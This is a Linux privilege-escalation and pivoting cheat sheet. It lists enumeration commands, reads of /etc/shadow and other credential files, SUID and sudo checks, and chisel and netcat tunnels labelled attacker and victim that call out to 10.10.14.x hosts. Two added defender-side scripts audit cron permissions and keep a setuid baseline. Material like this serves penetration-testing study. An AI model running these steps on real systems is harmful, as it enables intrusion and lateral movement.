Shell Stabilization
python -c 'import pty;pty.spawn("/bin/bash")' OR
python3 -c 'import pty;pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'
Ctrl + Z [Background Process]
stty raw -echo ; fg ;
reset
stty columns 200 rows 200
System Information[1]
* Get OS information # uname -a
* Check the PATH for any writable folders # echo "$PATH" | tr ':' '\n' | xargs -I{} find {} -maxdepth 0 -writable 2>/dev/null
* Check the env variables for any sensitive details # env
* Search for Kernel Exploits (e.g. PwnKit, DirtyCow etc) # linpeas
* Check the sudo version to see if it's vulnerable # sudo -V
# Version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
# Kernel Version
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz
# System enumeration Commands
ls /etc/*-release # -> looks for version numbers
cat /etc/os-release # -> cat out the file with the version numbers
hostname # -> return hostname of target
cat /etc/passwd # -> read passwd file for possible users
cat /etc/group # -> read groups for possible users
sudo cat /etc/shadow # -> read out shadow file for password hashes
ls -lh /var/mail # -> checks mail directories
ls /usr/bin /sbin # -> for applications
rpm -qa # -> list installed packages on RPM linux distro
dpkg -l # -> list installed packages on Debian linux distro
who # -> shows logged in users
whoami # -> shows what user you are logged in as
w # -> shows who is logged in and what they are doing
id # -> gives you your current UID and Group
last # -> displays login and logout info for users
sudo -l # -> which commands we can run with sudo
Enumeration Tools:
Drives
* List mounted drives
* Any unmounted drives
* Any credentials in fstab
Installed Software
* Check for useful software installed
* Check for vulnerable software installed
dpkg -l # List all programs installed
dpkg -l | grep "program" # Search for a specific program
rpm -qa | grep "program" # Search for a specific program
Processes
* Is any unknown software running
* Is any software running with more privileges than it should have
* Can you modify the binary of any running process
* Monitor processes and check if any interesting process is running frequently
* Can you read some interesting process memory
# Commands
ps aux # Lists all the processes currently running on the machine
ps aux | grep "root" # Shows all process that belong to root
ps axjf #Lists all the processes in a tree format
ps
-e -> all processes
-f -> full-format listing
-j -> jobs format
-l -> long format
-u -> user-oriented format
pspy can also be uploaded and run to see if there are any repeating processes
Process Tools:
Scheduled Task/Cron Jobs
* Is the PATH being modified by some cron job and you can write to it
* Any wildcard in a cron job
* Some modifiable script is being executed or is inside a modifiable folder
* A script that is being executed very frequently
#Commands
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
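The cron checks above boil down to one question: can a non-root user change what a root cron job executes? The following script is an added, defender-side audit and is not part of the original cheat sheet. It parses a file in /etc/crontab format (time spec, user, command), pulls out the first absolute path in each command, and reports scripts that are group- or other-writable or that live in a group-/other-writable directory. It assumes GNU find (for `-perm /mode`); the crontab and scripts in the demo are constructed sample data.

```shell
#!/bin/sh
# Added defender-side cron audit (not from the original cheat sheet).
# Assumes GNU find (-perm /mode) and a Linux userland.

# Print the first absolute path in the command part of one crontab line.
# Returns 1 for blank lines, comments, VAR=value lines and entries with no path.
cron_target() {
    case "$1" in
        ''|\#*|[A-Za-z_]*=*) return 1 ;;
    esac
    set -f                          # no globbing while the '*' fields are split
    set -- $1
    set +f
    case "$1" in
        @*) [ $# -ge 3 ] || return 1; shift 2 ;;   # @daily user command...
        *)  [ $# -ge 7 ] || return 1; shift 6 ;;   # m h dom mon dow user command...
    esac
    for tok in "$@"; do
        case "$tok" in
            /*) printf '%s\n' "$tok"; return 0 ;;
        esac
    done
    return 1
}

# Report group-/other-writable permissions on a path and on its parent directory.
# Returns 0 when at least one finding was printed.
loose_perms() {
    rc=1
    if [ -e "$1" ] && [ -n "$(find "$1" -maxdepth 0 -perm /022 2>/dev/null)" ]; then
        printf 'WRITABLE-FILE %s\n' "$1"; rc=0
    fi
    d=$(dirname "$1")
    if [ -d "$d" ] && [ -n "$(find "$d" -maxdepth 0 -perm /022 2>/dev/null)" ]; then
        printf 'WRITABLE-DIR %s (holds %s)\n' "$d" "$1"; rc=0
    fi
    return $rc
}

# Audit every entry in crontab file $1; prints one line per finding.
audit_crontab() {
    while IFS= read -r line || [ -n "$line" ]; do
        t=$(cron_target "$line") || continue
        loose_perms "$t" || true
    done < "$1"
}

# Demo on constructed files (sample data, not taken from any real host).
demo_audit() {
    tmp=$(mktemp -d) || return 1
    mkdir -p "$tmp/bin" "$tmp/loose"
    printf '#!/bin/sh\necho backup\n' > "$tmp/bin/backup.sh"
    printf '#!/bin/sh\necho rotate\n' > "$tmp/bin/rotate.sh"
    printf '#!/bin/sh\necho sync\n'   > "$tmp/loose/sync.sh"
    chmod 755 "$tmp/bin" "$tmp/bin/backup.sh" "$tmp/loose/sync.sh"
    chmod 777 "$tmp/bin/rotate.sh"    # the script itself is writable by anyone
    chmod 777 "$tmp/loose"            # the directory is writable by anyone
    cat > "$tmp/crontab" <<EOF
# constructed /etc/crontab sample
SHELL=/bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin
17 *  * * * root $tmp/bin/backup.sh
25 6  * * * root sh $tmp/bin/rotate.sh --force
@daily      root $tmp/loose/sync.sh
EOF
    audit_crontab "$tmp/crontab"
    rm -rf "$tmp"
}

demo_audit
```

Running it on a real host is `audit_crontab /etc/crontab` (and the same over the files in /etc/cron.d); backup.sh produces no finding, rotate.sh is reported as a writable file, and sync.sh is reported because its parent directory is writable. The remediation for each finding is the same: root-owned script, mode 755 or tighter, in a root-owned directory without group/other write.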
Services
* Any writeable .service file
* Any writeable binary executed by a service
* Any writeable folder in systemd PATH
* Any wrong allocations?
#Commands
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' # -> recursive listing of /etc filtered on readable entries
Environment Variables
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set
Timers
* Any writeable timers
Sockets
* Any writeable .socket file
* Can you communicate with any socket
* HTTP sockets with interesting info
D-BUS
* Can you communicate with any D-Bus
#Commands
dbus-monitor
Network
* Enumerate the network to know where you are
* Open ports you couldn't access before getting a shell inside the machine
* Can you sniff traffic using tcpdump
ip a s # -> shows current ip
cat /etc/resolv.conf # -> shows the DNS servers
netstat #-> shows info about network connections
-a #-> show both listening and non-listening sockets
-l #-> show only listening sockets
-n #-> show numeric output instead of resolving the IP address and port number
-t #-> TCP
-u #-> UDP
-x #-> UNIX
-p #-> show the PID and name of the program to which the socket belongs
sudo netstat -atupn #-> show all TCP/UDP listening and established connections with ports and owning process
sudo lsof -i #-> list open network files (sockets)
sudo lsof -i :<port number> #-> open network files on a specific port
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
lastlog
Users
* Generic users/groups enumeration
* Do you have a very big UID? Is the machine vulnerable?
* Can you escalate privileges thanks to a group you belong to?
* Clipboard data?
* Password Policy?
* Try to use every known password that you have discovered previously to login with each possible user. Try to login also without a password.
Writeable Path
* If you have write privileges over some folder in PATH you may be able to escalate privileges
Sudo and SUID Commands
* Can you execute any command with sudo? Can you use it to READ, WRITE or EXECUTE anything as root? (GTFOBins)
* Is there any exploitable SUID binary? (GTFOBins)
* Are sudo commands limited by path? can you bypass the restrictions?
* Sudo/SUID binary without path indicated?
* SUID binary specifying path? Bypass
* LD_PRELOAD vuln
* Lack of .so library in SUID binary from a writable folder?
* SUDO tokens available? Can you create a SUDO token?
* Can you read or modify sudoers files?
* Can you modify /etc/ld.so.conf.d/?
* OpenBSD DOAS command
# commands
find / -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -name user.txt 2>/dev/null
find / -perm -u=s -type f 2>/dev/null | xargs ls -la
find / -user root -perm /4000 2>/dev/null
find / -type f -name '*.txt' 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null > /tmp/suid
getcap -r / 2>/dev/null
SUID Tools:[3]
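The find and getcap one-liners above answer "what is setuid right now?"; on a host you maintain, the more useful question is "what changed since the last known-good state?". The following script is an added, defender-side example and is not part of the original cheat sheet. It snapshots every setuid/setgid file under a tree as "mode owner:group path" and reports anything missing from a baseline written earlier, so a new or re-permissioned binary shows up. It assumes GNU find (`-printf`) and coreutils sort/comm; the tree in the demo is constructed sample data.

```shell
#!/bin/sh
# Added defender-side setuid/setgid baseline check (not from the original cheat sheet).
# Assumes GNU find (-printf) and coreutils sort/comm.

# List setuid/setgid regular files under $1 as "mode owner:group path",
# sorted bytewise so the output is stable input for comm(1).
suid_list() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -printf '%M %u:%g %p\n' 2>/dev/null | LC_ALL=C sort
}

# Compare tree $2 against baseline file $1 (written earlier by suid_list).
# Prints "NEW <entry>" for every entry not in the baseline and returns 1 when
# anything is new, so the function can gate a cron job or a CI step.
suid_diff() {
    new=$(suid_list "$2" | LC_ALL=C comm -13 "$1" -)
    [ -z "$new" ] && return 0
    printf '%s\n' "$new" | sed 's/^/NEW /'
    return 1
}

# Demo on a constructed tree (sample data, not taken from any real host).
demo_suid() {
    tmp=$(mktemp -d) || return 1
    mkdir -p "$tmp/root/usr/bin" "$tmp/root/opt/app"
    printf '#!/bin/sh\n' > "$tmp/root/usr/bin/passwd"
    printf '#!/bin/sh\n' > "$tmp/root/usr/bin/ls"
    chmod 4755 "$tmp/root/usr/bin/passwd"    # expected setuid binary
    chmod 755  "$tmp/root/usr/bin/ls"
    suid_list "$tmp/root" > "$tmp/baseline"  # known-good snapshot
    printf '#!/bin/sh\n' > "$tmp/root/opt/app/helper"
    chmod 4755 "$tmp/root/opt/app/helper"    # appears after the baseline was taken
    suid_diff "$tmp/baseline" "$tmp/root"
    rc=$?
    rm -rf "$tmp"
    return $rc
}

demo_suid || echo "setuid/setgid files outside the baseline were found"
```

On a real host the baseline is `suid_list / > /var/lib/suid-baseline` taken after installation, and the periodic check is `suid_diff /var/lib/suid-baseline /`. Because the entry includes the mode and owner, a file that merely gained the setuid bit, or changed owner, is reported as NEW as well; to list files that dropped out of the baseline, run the same pipeline with `comm -23`.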
Capabilities
* Does any binary have an unexpected capability?
# Commands
getcap -r / 2>/dev/null # -> list file capabilities
ACLs
* Does any file have an unexpected ACL?
Open Shell Sessions
* Screen
* Tmux
SSH
* Debian OpenSSL Predictable PRNG - CVE-2008-0166
* SSH Interesting configuration values
# Port Forwarding
ssh -R <local-port>:127.0.0.1:<service-port> <username>@<local-machine>
ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port
./chisel_1.7.6_linux_amd64 server -p 12312 --reverse #Server -- Attacker
./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 #Client -- Victim
# Socks
./chisel server -p 8080 --reverse #Server -- Attacker
./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client -- Victim
#And now you can use proxychains with port 1080 (default)
./chisel server -v -p 8080 --socks5 #Server -- Victim (needs to have port 8080 exposed)
./chisel client -v 10.10.10.10:8080 socks #Attacker
#Rpivot
Port Forwarding
FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay
mknod backpipe p ; nc -l -p 8080 0<backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy monitor (Port 80 to 8080): inflow/outflow files capture both directions
Interesting Files
* Profile files - Read sensitive data? Write to privesc?
* passwd/shadow files - Read sensitive data? Write to privesc?
* Check commonly interesting folders for sensitive data
* Weird Location/Owned files, you may have access to or alter executable files
* Modified in last mins
* Sqlite DB files
* Hidden files
* Script/Binaries in PATH
* Web files (passwords?)
* Backups?
* Known files that contain passwords: Use Linpeas and LaZagne
* Generic search
Writeable Files
* Modify python library to execute arbitrary commands?
* Can you modify log files? Logrotten exploit
* Can you modify /etc/sysconfig/network-scripts/? Centos/Redhat exploit
* Can you write in ini, init.d, systemd or rc.d files?
Other Tricks
* Can you abuse NFS to escalate privileges?
* Do you need to escape from a restrictive shell?